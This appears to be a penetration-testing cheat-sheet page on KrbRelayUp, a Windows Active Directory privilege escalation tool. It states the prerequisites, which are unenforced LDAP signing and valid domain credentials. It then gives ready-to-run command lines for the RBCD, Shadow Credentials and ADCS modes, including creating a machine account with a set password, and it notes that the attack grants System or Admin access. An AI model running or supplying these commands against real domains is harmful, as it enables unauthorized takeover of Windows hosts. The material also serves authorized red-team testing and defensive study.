KrbRelayUp

Link: https://github.com/Dec0ne/KrbRelayUp

Requirements: LDAP Signing is not enforced. Valid domain user credentials.

1) RBCD

./KrbRelayUp.exe relay -Domain domain.local -CreateNewComputerAccount -ComputerName test$ -ComputerPassword Password123!
./KrbRelayUp.exe spawn -d domain.local -cn test$ -cp Password123!

2) ShadowCreds

./KrbRelayUp.exe full -m shadowcred --ForceShadowCred

3) ADCS

./KrbRelayUp.exe full -m adcs

Example

.\KrbRelayUp.exe relay -Domain DOMAIN -CreateNewComputerAccount -ComputerName COMPUTER$ -ComputerPassword PASSWORD

.\KrbRelayUp.exe spawn -m rbcd -d DOMAIN -dc DC -cn COMPUTER_NAME -cp COMPUTER_PASS

This attack grants System/Admin access

PreviousKerberoasting NextLocal Administrator Password Solution (LAPS)

Last updated 8 months ago

hashtagKrbRelayUp

hashtagRequirements: LDAP Signing is not enforced. Valid domain user credentials.

hashtag1) RBCD

hashtag2) ShadowCreds

hashtag3) ADCS

hashtagExample

hashtagThis attack grants System/Admin access

KrbRelayUp

Requirements: LDAP Signing is not enforced. Valid domain user credentials.

1) RBCD

2) ShadowCreds

3) ADCS

Example

This attack grants System/Admin access